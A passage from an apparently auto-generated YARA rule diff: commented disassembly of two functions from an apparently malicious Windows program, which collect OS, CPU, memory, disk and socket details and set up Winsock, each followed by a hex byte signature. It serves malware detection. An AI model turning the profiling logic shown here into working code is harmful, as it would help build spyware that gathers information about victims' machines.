arg2 + .text:0x004052a0 8: int arg1 + .text:0x004052a0 4: int arg0 + .text:0x004052a0 -256: int local256 + .text:0x004052a0 -260: int local260 + .text:0x004052a0 -516: int local516 + .text:0x004052a0 -768: int local768 + .text:0x004052a0 -772: int local772 + .text:0x004052a0 -872: int local872 + .text:0x004052a0 -972: int local972 + .text:0x004052a0 -1072: int local1072 + .text:0x004052a0 -1220: int local1220 + .text:0x004052a0 -1224: int local1224 + .text:0x004052a0 -1228: int 
local1228 + .text:0x004052a0 -1278: int local1278 + .text:0x004052a0 -1328: int local1328 + .text:0x004052a0 -1378: int local1378 + .text:0x004052a0 -1428: int local1428 + .text:0x004052a0 -1432: int local1432 + .text:0x004052a0 -1436: int local1436 + .text:0x004052a0 -1440: int local1440 + .text:0x004052a0 -1444: int local1444 + .text:0x004052a0 -1496: int local1496 + .text:0x004052a0 -1500: int local1500 + .text:0x004052a0 -1520: int local1520 + .text:0x004052a0 -1524: int local1524 + .text:0x004052a0 -1676: int local1676 + .text:0x004052a0 -1680: int local1680 + .text:0x004052a0 -1684: int local1684 + .text:0x004052a0 -1700: int local1700 + .text:0x004052a0 -1720: int local1720 + .text:0x004052a0 -1772: int local1772 + .text:0x004052a0 -1776: int local1776 + .text:0x004052a0 -1784: int local1784 + .text:0x004052a0 -1792: int local1792 + .text:0x004052a0 -1800: int local1800 + .text:0x004052a0 -1804: int local1804 + .text:0x004052a0 -1808: int local1808 + .text:0x004052a0 -1812: int local1812 + .text:0x004052a0 -1820: int local1820 + .text:0x004052a0 -1824: int local1824 + .text:0x004052a0 -1837: int local1837 + .text:0x004052a0 -1838: int local1838 + .text:0x004052a0 -1839: int local1839 + .text:0x004052a0 -1840: int local1840 + .text:0x004052a0 -1844: int local1844 + .text:0x004052a0 -1845: int local1845 + .text:0x004052a0 -1846: int local1846 + .text:0x004052a0 -1847: int local1847 + .text:0x004052a0 -1848: int local1848 + .text:0x004052a0 -1849: int local1849 + .text:0x004052a0 -1850: int local1850 + .text:0x004052a0 -1851: int local1851 + .text:0x004052a0 -1852: int local1852 + .text:0x004052a0 -1853: int local1853 + .text:0x004052a0 -1854: int local1854 + .text:0x004052a0 -1855: int local1855 + .text:0x004052a0 -1856: int local1856 + .text:0x004052a0 -1860: int local1860 + .text:0x004052a0 -1862: int local1862 + .text:0x004052a0 -1863: int local1863 + .text:0x004052a0 -1864: int local1864 + .text:0x004052a0 + .text:0x004052a0 81ec44070000 sub esp,1860 + 
.text:0x004052a6 53 push ebx + .text:0x004052a7 55 push ebp + .text:0x004052a8 56 push esi + .text:0x004052a9 8b3578904000 mov esi,dword [0x00409078] + .text:0x004052af 57 push edi + .text:0x004052b0 6a00 push 0 + .text:0x004052b2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052b4 6a00 push 0 + .text:0x004052b6 c644241825 mov byte [esp + 24],37 + .text:0x004052bb c644241964 mov byte [esp + 25],100 + .text:0x004052c0 c644241a00 mov byte [esp + 26],0 + .text:0x004052c5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052c7 6a00 push 0 + .text:0x004052c9 c68424c800000066 mov byte [esp + 200],102 + .text:0x004052d1 c78424c001000000 mov dword [esp + 448],0 + .text:0x004052dc ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052de bd9c000000 mov ebp,156 + .text:0x004052e3 6a00 push 0 + .text:0x004052e5 89ac24cc000000 mov dword [esp + 204],ebp + .text:0x004052ec ffd6 call esi ;kernel32.Sleep(0) + .text:0x004052ee 8b842458070000 mov eax,dword [esp + 1880] + .text:0x004052f5 8b1d94904000 mov ebx,dword [0x00409094] + .text:0x004052fb 8d8c2454040000 lea ecx,dword [esp + 1108] + .text:0x00405302 50 push eax + .text:0x00405303 51 push ecx + .text:0x00405304 ffd3 call ebx ;kernel32.lstrcpyA(local768,arg0) + .text:0x00405306 6a00 push 0 + .text:0x00405308 ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040530a 8b3d0c914000 mov edi,dword [0x0040910c] + .text:0x00405310 8d9424c8000000 lea edx,dword [esp + 200] + .text:0x00405317 52 push edx + .text:0x00405318 ffd7 call edi ;kernel32.GetVersionExA(local1676) + .text:0x0040531a 6a00 push 0 + .text:0x0040531c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040531e 6a00 push 0 + .text:0x00405320 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405322 8d842454060000 lea eax,dword [esp + 1620] + .text:0x00405329 6800010000 push 256 + .text:0x0040532e 8d8c2458040000 lea ecx,dword [esp + 1112] + .text:0x00405335 50 push eax + .text:0x00405336 51 push ecx + .text:0x00405337 e8b4fdffff call 0x004050f0 ;sub_004050f0(local768,local256,256) + .text:0x0040533c 
83c40c add esp,12 + .text:0x0040533f 6a00 push 0 + .text:0x00405341 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405343 33d2 xor edx,edx + .text:0x00405345 c744243410000000 mov dword [esp + 52],16 + .text:0x0040534d 89542440 mov dword [esp + 64],edx + .text:0x00405351 89542444 mov dword [esp + 68],edx + .text:0x00405355 89542448 mov dword [esp + 72],edx + .text:0x00405359 52 push edx + .text:0x0040535a 89542450 mov dword [esp + 80],edx + .text:0x0040535e ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405360 8b94245c070000 mov edx,dword [esp + 1884] + .text:0x00405367 8d442434 lea eax,dword [esp + 52] + .text:0x0040536b 50 push eax + .text:0x0040536c 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00405370 8b82a8000000 mov eax,dword [edx + 168] + .text:0x00405376 51 push ecx + .text:0x00405377 50 push eax + .text:0x00405378 ff151c924000 call dword [0x0040921c] ;ws2_32.getsockname(0x61616161,local1812) + .text:0x0040537e 6a00 push 0 + .text:0x00405380 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405382 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00405386 6a04 push 4 + .text:0x00405388 8d942480010000 lea edx,dword [esp + 384] + .text:0x0040538f 51 push ecx + .text:0x00405390 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00405396 52 push edx + .text:0x00405397 e8c4f1ffff call 0x00404560 ;sub_00404560(local1500,local1812,4) + .text:0x0040539c 6a00 push 0 + .text:0x0040539e ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053a0 8d842454060000 lea eax,dword [esp + 1620] + .text:0x004053a7 6a32 push 50 + .text:0x004053a9 8d8c2484010000 lea ecx,dword [esp + 388] + .text:0x004053b0 50 push eax + .text:0x004053b1 51 push ecx + .text:0x004053b2 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004053b8 e8a3f1ffff call 0x00404560 ;sub_00404560(local1496,local260,50) + .text:0x004053bd e80ef9ffff call 0x00404cd0 ;sub_00404cd0() + .text:0x004053c2 89842464010000 mov dword [esp + 356],eax + .text:0x004053c9 6a00 push 0 + .text:0x004053cb 89ac2490020000 mov dword [esp + 656],ebp + 
.text:0x004053d2 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053d4 8d94248c020000 lea edx,dword [esp + 652] + .text:0x004053db 52 push edx + .text:0x004053dc ffd7 call edi ;kernel32.GetVersionExA(local1228) + .text:0x004053de 6a00 push 0 + .text:0x004053e0 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004053e2 8b842490020000 mov eax,dword [esp + 656] + .text:0x004053e9 8b2dd8914000 mov ebp,dword [0x004091d8] + .text:0x004053ef 83f805 cmp eax,5 + .text:0x004053f2 752a jnz 0x0040541e + .text:0x004053f4 8b842494020000 mov eax,dword [esp + 660] + .text:0x004053fb 85c0 test eax,eax + .text:0x004053fd 751f jnz 0x0040541e + .text:0x004053ff 6a00 push 0 + .text:0x00405401 c644241431 mov byte [esp + 20],49 + .text:0x00405406 c644241500 mov byte [esp + 21],0 + .text:0x0040540b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040540d 8d442410 lea eax,dword [esp + 16] + .text:0x00405411 8d8c2468010000 lea ecx,dword [esp + 360] + .text:0x00405418 50 push eax + .text:0x00405419 51 push ecx + .text:0x0040541a ffd3 call ebx ;kernel32.lstrcpyA(local1520,local1864) + .text:0x0040541c eb43 jmp 0x00405461 + .text:0x0040541e loc_0040541e: [2 XREFS] + .text:0x0040541e 6a00 push 0 + .text:0x00405420 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405422 8d9424a0000000 lea edx,dword [esp + 160] + .text:0x00405429 52 push edx + .text:0x0040542a ff1508914000 call dword [0x00409108] ;kernel32.GetSystemInfo(local1720) + .text:0x00405430 6a00 push 0 + .text:0x00405432 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405434 8b8424b4000000 mov eax,dword [esp + 180] + .text:0x0040543b 8d4c2410 lea ecx,dword [esp + 16] + .text:0x0040543f 50 push eax + .text:0x00405440 8d94246c010000 lea edx,dword [esp + 364] + .text:0x00405447 51 push ecx + .text:0x00405448 52 push edx + .text:0x00405449 c644241c25 mov byte [esp + 28],37 + .text:0x0040544e c644241d64 mov byte [esp + 29],100 + .text:0x00405453 c644241e00 mov byte [esp + 30],0 + .text:0x00405458 ffd5 call ebp ;user32.wsprintfA(local1520,local1864) + 
.text:0x0040545a 83c40c add esp,12 + .text:0x0040545d 6a00 push 0 + .text:0x0040545f ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405461 loc_00405461: [1 XREFS] + .text:0x00405461 6a00 push 0 + .text:0x00405463 c744246440000000 mov dword [esp + 100],64 + .text:0x0040546b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040546d 8d442460 lea eax,dword [esp + 96] + .text:0x00405471 50 push eax + .text:0x00405472 ff1504914000 call dword [0x00409104] ;kernel32.GlobalMemoryStatusEx(local1784) + .text:0x00405478 6a00 push 0 + .text:0x0040547a ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040547c 8b442468 mov eax,dword [esp + 104] + .text:0x00405480 8b54246c mov edx,dword [esp + 108] + .text:0x00405484 b914000000 mov ecx,20 + .text:0x00405489 e8122a0000 call 0x00407ea0 ;__aullshr(0xfefefefe,0xfefefefe,20) + .text:0x0040548e 898424b4010000 mov dword [esp + 436],eax + .text:0x00405495 c744241000000000 mov dword [esp + 16],0 + .text:0x0040549d 33db xor ebx,ebx + .text:0x0040549f loc_0040549f: [1 XREFS] + .text:0x0040549f 8acb mov cl,bl + .text:0x004054a1 6a00 push 0 + .text:0x004054a3 80c142 add cl,66 + .text:0x004054a6 c644242d3a mov byte [esp + 45],58 + .text:0x004054ab 884c242c mov byte [esp + 44],cl + .text:0x004054af c644242e5c mov byte [esp + 46],92 + .text:0x004054b4 c644242f00 mov byte [esp + 47],0 + .text:0x004054b9 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054bb 8d542428 lea edx,dword [esp + 40] + .text:0x004054bf 52 push edx + .text:0x004054c0 ff1500914000 call dword [0x00409100] ;kernel32.GetDriveTypeA(local1840) + .text:0x004054c6 6a00 push 0 + .text:0x004054c8 8bf8 mov edi,eax + .text:0x004054ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054cc 83ff03 cmp edi,3 + .text:0x004054cf 7538 jnz 0x00405509 + .text:0x004054d1 6a00 push 0 + .text:0x004054d3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054d5 8d442450 lea eax,dword [esp + 80] + .text:0x004054d9 8d4c2438 lea ecx,dword [esp + 56] + .text:0x004054dd 50 push eax + .text:0x004054de 8d54245c lea edx,dword [esp + 
92] + .text:0x004054e2 51 push ecx + .text:0x004054e3 8d442430 lea eax,dword [esp + 48] + .text:0x004054e7 52 push edx + .text:0x004054e8 50 push eax + .text:0x004054e9 ff15fc904000 call dword [0x004090fc] ;kernel32.GetDiskFreeSpaceExA(local1840,local1792,local1824,local1800) + .text:0x004054ef 6a00 push 0 + .text:0x004054f1 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004054f3 8b442438 mov eax,dword [esp + 56] + .text:0x004054f7 8b54243c mov edx,dword [esp + 60] + .text:0x004054fb b914000000 mov ecx,20 + .text:0x00405500 e89b290000 call 0x00407ea0 ;__aullshr(16,0xfefefefe,20) + .text:0x00405505 01442410 add dword [esp + 16],eax + .text:0x00405509 loc_00405509: [1 XREFS] + .text:0x00405509 43 inc ebx + .text:0x0040550a 83fb1a cmp ebx,26 + .text:0x0040550d 7c90 jl 0x0040549f + .text:0x0040550f 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00405513 898c24b8010000 mov dword [esp + 440],ecx + .text:0x0040551a e821f9ffff call 0x00404e40 ;sub_00404e40() + .text:0x0040551f 8b942460070000 mov edx,dword [esp + 1888] + .text:0x00405526 6a00 push 0 + .text:0x00405528 898424c0010000 mov dword [esp + 448],eax + .text:0x0040552f 899424c4010000 mov dword [esp + 452],edx + .text:0x00405536 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405538 ff15d0904000 call dword [0x004090d0] ;kernel32.GetTickCount() + .text:0x0040553e 8bf8 mov edi,eax + .text:0x00405540 b83bd4b531 mov eax,0x31b5d43b + .text:0x00405545 f7e7 mul edi + .text:0x00405547 c1ea18 shr edx,24 + .text:0x0040554a 8d442414 lea eax,dword [esp + 20] + .text:0x0040554e 52 push edx + .text:0x0040554f 8d8c24f4030000 lea ecx,dword [esp + 1012] + .text:0x00405556 50 push eax + .text:0x00405557 51 push ecx + .text:0x00405558 ffd5 call ebp ;user32.wsprintfA(local872,local1860) + .text:0x0040555a 8bc7 mov eax,edi + .text:0x0040555c 33d2 xor edx,edx + .text:0x0040555e b9005c2605 mov ecx,0x05265c00 + .text:0x00405563 f7f1 div ecx + .text:0x00405565 b8b17c2195 mov eax,0x95217cb1 + .text:0x0040556a 8bfa mov edi,edx + .text:0x0040556c f7e7 
mul edi + .text:0x0040556e c1ea15 shr edx,21 + .text:0x00405571 52 push edx + .text:0x00405572 8d542424 lea edx,dword [esp + 36] + .text:0x00405576 8d84249c030000 lea eax,dword [esp + 924] + .text:0x0040557d 52 push edx + .text:0x0040557e 50 push eax + .text:0x0040557f ffd5 call ebp ;user32.wsprintfA(local972,local1860) + .text:0x00405581 8bc7 mov eax,edi + .text:0x00405583 33d2 xor edx,edx + .text:0x00405585 b980ee3600 mov ecx,0x0036ee80 + .text:0x0040558a f7f1 div ecx + .text:0x0040558c b873b2e745 mov eax,0x45e7b273 + .text:0x00405591 f7e2 mul edx + .text:0x00405593 c1ea0e shr edx,14 + .text:0x00405596 52 push edx + .text:0x00405597 8d542430 lea edx,dword [esp + 48] + .text:0x0040559b 8d842444030000 lea eax,dword [esp + 836] + .text:0x004055a2 52 push edx + .text:0x004055a3 50 push eax + .text:0x004055a4 ffd5 call ebp ;user32.wsprintfA(local1072,local1860) + .text:0x004055a6 83c424 add esp,36 + .text:0x004055a9 b073 mov al,115 + .text:0x004055ab c644241825 mov byte [esp + 24],37 + .text:0x004055b0 88442419 mov byte [esp + 25],al + .text:0x004055b4 6a00 push 0 + .text:0x004055b6 c644241e25 mov byte [esp + 30],37 + .text:0x004055bb 8844241f mov byte [esp + 31],al + .text:0x004055bf c644242025 mov byte [esp + 32],37 + .text:0x004055c4 88442421 mov byte [esp + 33],al + .text:0x004055c8 c644242225 mov byte [esp + 34],37 + .text:0x004055cd 88442423 mov byte [esp + 35],al + .text:0x004055d1 c644242425 mov byte [esp + 36],37 + .text:0x004055d6 88442425 mov byte [esp + 37],al + .text:0x004055da c644242625 mov byte [esp + 38],37 + .text:0x004055df 88442427 mov byte [esp + 39],al + .text:0x004055e3 c644242800 mov byte [esp + 40],0 + .text:0x004055e8 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004055ea 8d8c2428030000 lea ecx,dword [esp + 808] + .text:0x004055f1 688ca54000 push 0x0040a58c + .text:0x004055f6 51 push ecx + .text:0x004055f7 8d942494030000 lea edx,dword [esp + 916] + .text:0x004055fe 6888a54000 push 0x0040a588 + .text:0x00405603 52 push edx + .text:0x00405604 
8d842400040000 lea eax,dword [esp + 1024] + .text:0x0040560b 6884a54000 push 0x0040a584 + .text:0x00405610 8d4c242c lea ecx,dword [esp + 44] + .text:0x00405614 50 push eax + .text:0x00405615 8d942472020000 lea edx,dword [esp + 626] + .text:0x0040561c 51 push ecx + .text:0x0040561d 52 push edx + .text:0x0040561e ffd5 call ebp ;user32.wsprintfA(local1278,local1856) + .text:0x00405620 83c420 add esp,32 + .text:0x00405623 6a00 push 0 + .text:0x00405625 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405627 8b842464070000 mov eax,dword [esp + 1892] + .text:0x0040562e 8d8c24c4010000 lea ecx,dword [esp + 452] + .text:0x00405635 50 push eax + .text:0x00405636 51 push ecx + .text:0x00405637 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x0040563d e82ef1ffff call 0x00404770 ;sub_00404770(local1428,arg2) + .text:0x00405642 6a00 push 0 + .text:0x00405644 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405646 8d9424f6010000 lea edx,dword [esp + 502] + .text:0x0040564d 6a32 push 50 + .text:0x0040564f 8d842458040000 lea eax,dword [esp + 1112] + .text:0x00405656 52 push edx + .text:0x00405657 50 push eax + .text:0x00405658 e8b3fbffff call 0x00405210 ;sub_00405210(local772,local1378,50) + .text:0x0040565d 83c40c add esp,12 + .text:0x00405660 6a00 push 0 + .text:0x00405662 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405664 8d8c2454050000 lea ecx,dword [esp + 1364] + .text:0x0040566b 6800010000 push 256 + .text:0x00405670 8d942458040000 lea edx,dword [esp + 1112] + .text:0x00405677 51 push ecx + .text:0x00405678 52 push edx + .text:0x00405679 e8f2faffff call 0x00405170 ;sub_00405170(local516,local772,local516,256) + .text:0x0040567e 83c40c add esp,12 + .text:0x00405681 bf70a54000 mov edi,0x0040a570 + .text:0x00405686 85c0 test eax,eax + .text:0x00405688 7407 jz 0x00405691 + .text:0x0040568a 8dbc2454050000 lea edi,dword [esp + 1364] + .text:0x00405691 loc_00405691: [1 XREFS] + .text:0x00405691 6a00 push 0 + .text:0x00405693 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00405695 8b0dd4aa4000 
mov ecx,dword [0x0040aad4] + .text:0x0040569b 8d842428020000 lea eax,dword [esp + 552] + .text:0x004056a2 57 push edi + .text:0x004056a3 50 push eax + .text:0x004056a4 e8c7f0ffff call 0x00404770 ;sub_00404770(local1328,0x0040a570) + .text:0x004056a9 6a00 push 0 + .text:0x004056ab ffd6 call esi ;kernel32.Sleep(0) + .text:0x004056ad 8d8c24c4000000 lea ecx,dword [esp + 196] + .text:0x004056b4 68c8010000 push 456 + .text:0x004056b9 51 push ecx + .text:0x004056ba 8b8c2464070000 mov ecx,dword [esp + 1892] + .text:0x004056c1 e88acbffff call 0x00402250 ;sub_00402250(arg0,local1684,456) + .text:0x004056c6 6a00 push 0 + .text:0x004056c8 8bf8 mov edi,eax + .text:0x004056ca ffd6 call esi ;kernel32.Sleep(0) + .text:0x004056cc 8bc7 mov eax,edi + .text:0x004056ce 5f pop edi + .text:0x004056cf 5e pop esi + .text:0x004056d0 5d pop ebp + .text:0x004056d1 5b pop ebx + .text:0x004056d2 81c444070000 add esp,1860 + .text:0x004056d8 c3 ret + */ + $c25 = { 81 EC 44 07 00 00 53 55 56 8B 35 ?? ?? ?? ?? 57 6A 00 FF D6 6A 00 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 00 FF D6 6A 00 C6 84 24 ?? ?? ?? ?? 66 C7 84 24 ?? ?? ?? ?? 00 00 00 00 FF D6 BD 9C 00 00 00 6A 00 89 AC 24 ?? ?? ?? ?? FF D6 8B 84 24 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 51 FF D3 6A 00 FF D6 8B 3D ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 6A 00 FF D6 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 68 00 01 00 00 8D 8C 24 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 33 D2 C7 44 24 ?? 10 00 00 00 89 54 24 ?? 89 54 24 ?? 89 54 24 ?? 52 89 54 24 ?? FF D6 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 4C 24 ?? 8B 82 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8D 4C 24 ?? 6A 04 8D 94 24 ?? ?? ?? ?? 51 8B 0D ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 84 24 ?? ?? ?? ?? 6A 32 8D 8C 24 ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 6A 00 89 AC 24 ?? ?? ?? ?? FF D6 8D 94 24 ?? ?? ?? ?? 52 FF D7 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 F8 05 75 ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 
6A 00 C6 44 24 ?? 31 C6 44 24 ?? 00 FF D6 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 51 FF D3 EB ?? 6A 00 FF D6 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 C6 44 24 ?? 25 C6 44 24 ?? 64 C6 44 24 ?? 00 FF D5 83 C4 0C 6A 00 FF D6 6A 00 C7 44 24 ?? 40 00 00 00 FF D6 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 44 24 ?? 8B 54 24 ?? B9 14 00 00 00 E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 33 DB 8A CB 6A 00 80 C1 42 C6 44 24 ?? 3A 88 4C 24 ?? C6 44 24 ?? 5C C6 44 24 ?? 00 FF D6 8D 54 24 ?? 52 FF 15 ?? ?? ?? ?? 6A 00 8B F8 FF D6 83 FF 03 75 ?? 6A 00 FF D6 8D 44 24 ?? 8D 4C 24 ?? 50 8D 54 24 ?? 51 8D 44 24 ?? 52 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 44 24 ?? 8B 54 24 ?? B9 14 00 00 00 E8 ?? ?? ?? ?? 01 44 24 ?? 43 83 FB 1A 7C ?? 8B 4C 24 ?? 89 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 6A 00 89 84 24 ?? ?? ?? ?? 89 94 24 ?? ?? ?? ?? FF D6 FF 15 ?? ?? ?? ?? 8B F8 B8 3B D4 B5 31 F7 E7 C1 EA 18 8D 44 24 ?? 52 8D 8C 24 ?? ?? ?? ?? 50 51 FF D5 8B C7 33 D2 B9 00 5C 26 05 F7 F1 B8 B1 7C 21 95 8B FA F7 E7 C1 EA 15 52 8D 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 50 FF D5 8B C7 33 D2 B9 80 EE 36 00 F7 F1 B8 73 B2 E7 45 F7 E2 C1 EA 0E 52 8D 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 50 FF D5 83 C4 24 B0 73 C6 44 24 ?? 25 88 44 24 ?? 6A 00 C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 25 88 44 24 ?? C6 44 24 ?? 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 8C A5 40 00 51 8D 94 24 ?? ?? ?? ?? 68 88 A5 40 00 52 8D 84 24 ?? ?? ?? ?? 68 84 A5 40 00 8D 4C 24 ?? 50 8D 94 24 ?? ?? ?? ?? 51 52 FF D5 83 C4 20 6A 00 FF D6 8B 84 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 FF D6 8D 94 24 ?? ?? ?? ?? 6A 32 8D 84 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 0C 6A 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 00 01 00 00 8D 94 24 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 0C BF 70 A5 40 00 85 C0 74 ?? 8D BC 24 ?? ?? ?? ?? 6A 00 FF D6 8B 0D ?? ?? 
?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 6A 00 FF D6 8D 8C 24 ?? ?? ?? ?? 68 C8 01 00 00 51 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A 00 8B F8 FF D6 8B C7 5F 5E 5D 5B 81 C4 44 07 00 00 C3 } + /* +function at 0x00401610@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - initialize Winsock library + .text:0x00401610 + .text:0x00401610 FUNC: int thiscall sub_00401610( void * ecx, ) [4 XREFS] + .text:0x00401610 + .text:0x00401610 Stack Variables: (offset from initial top of stack) + .text:0x00401610 -4: int local4 + .text:0x00401610 -12: int local12 + .text:0x00401610 -412: int local412 + .text:0x00401610 -416: int local416 + .text:0x00401610 -420: int local420 + .text:0x00401610 -421: int local421 + .text:0x00401610 -422: int local422 + .text:0x00401610 -423: int local423 + .text:0x00401610 -424: int local424 + .text:0x00401610 + .text:0x00401610 6aff push 0xffffffff + .text:0x00401612 6848834000 push 0x00408348 + .text:0x00401617 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x0040161d 50 push eax + .text:0x0040161e 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00401625 81ec9c010000 sub esp,412 + .text:0x0040162b 56 push esi + .text:0x0040162c 8bf1 mov esi,ecx + .text:0x0040162e 8974240c mov dword [esp + 12],esi + .text:0x00401632 8d4e04 lea ecx,dword [esi + 4] + .text:0x00401635 e8c6f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040163a 8d4e2c lea ecx,dword [esi + 44] + .text:0x0040163d c78424a801000000 mov dword [esp + 424],0 + .text:0x00401648 e8b3f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040164d 8d4e54 lea ecx,dword [esi + 84] + .text:0x00401650 c68424a801000001 mov byte [esp + 424],1 + .text:0x00401658 e8a3f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040165d 8d4e7c lea ecx,dword [esi + 124] + .text:0x00401660 c68424a801000002 mov byte [esp + 424],2 + .text:0x00401668 e893f9ffff call 0x00401000 ;sub_00401000(ecx) + .text:0x0040166d 8d442410 lea eax,dword [esp + 16] + .text:0x00401671 c68424a801000003 mov byte [esp + 
424],3 + .text:0x00401679 50 push eax + .text:0x0040167a 6802020000 push 514 + .text:0x0040167f c70668924000 mov dword [esi],0x00409268 + .text:0x00401685 ff1528924000 call dword [0x00409228] ;ws2_32.WSAStartup(514,local412) + .text:0x0040168b 6a00 push 0 + .text:0x0040168d 6a00 push 0 + .text:0x0040168f 6a01 push 1 + .text:0x00401691 6a00 push 0 + .text:0x00401693 ff1584904000 call dword [0x00409084] ;kernel32.CreateEventA(0,1,0,0) + .text:0x00401699 8d4c2404 lea ecx,dword [esp + 4] + .text:0x0040169d 8986ac000000 mov dword [esi + 172],eax + .text:0x004016a3 6a05 push 5 + .text:0x004016a5 c686b000000000 mov byte [esi + 176],0 + .text:0x004016ac c786a8000000ffff mov dword [esi + 168],0xffffffff + .text:0x004016b6 b075 mov al,117 + .text:0x004016b8 51 push ecx + .text:0x004016b9 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016bf 6894a54000 push 0x0040a594 + .text:0x004016c4 c64424104b mov byte [esp + 16],75 + .text:0x004016c9 88442411 mov byte [esp + 17],al + .text:0x004016cd c644241247 mov byte [esp + 18],71 + .text:0x004016d2 c64424136f mov byte [esp + 19],111 + .text:0x004016d7 88442414 mov byte [esp + 20],al + .text:0x004016db e8802e0000 call 0x00404560 ;sub_00404560(0x0040a594,local424,5) + .text:0x004016e0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016e6 6834ac4000 push 0x0040ac34 + .text:0x004016eb e800300000 call 0x004046f0 ;sub_004046f0(0x0040ac34) + .text:0x004016f0 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x004016f6 50 push eax + .text:0x004016f7 6834ac4000 push 0x0040ac34 + .text:0x004016fc 68a0a74000 push 0x0040a7a0 + .text:0x00401701 e84a320000 call 0x00404950 ;sub_00404950(0x0040a7a0,0x0040ac34,sub_004046f0(0x0040ac34)) + .text:0x00401706 8b8c24a0010000 mov ecx,dword [esp + 416] + .text:0x0040170d 8bc6 mov eax,esi + .text:0x0040170f 5e pop esi + .text:0x00401710 64890d00000000 fs: mov dword [0x00000000],ecx + .text:0x00401717 81c4a8010000 add esp,424 + .text:0x0040171d c3 ret + */ + $c26 = { 6A FF 68 48 83 40 00 64 A1 ?? ?? ?? 
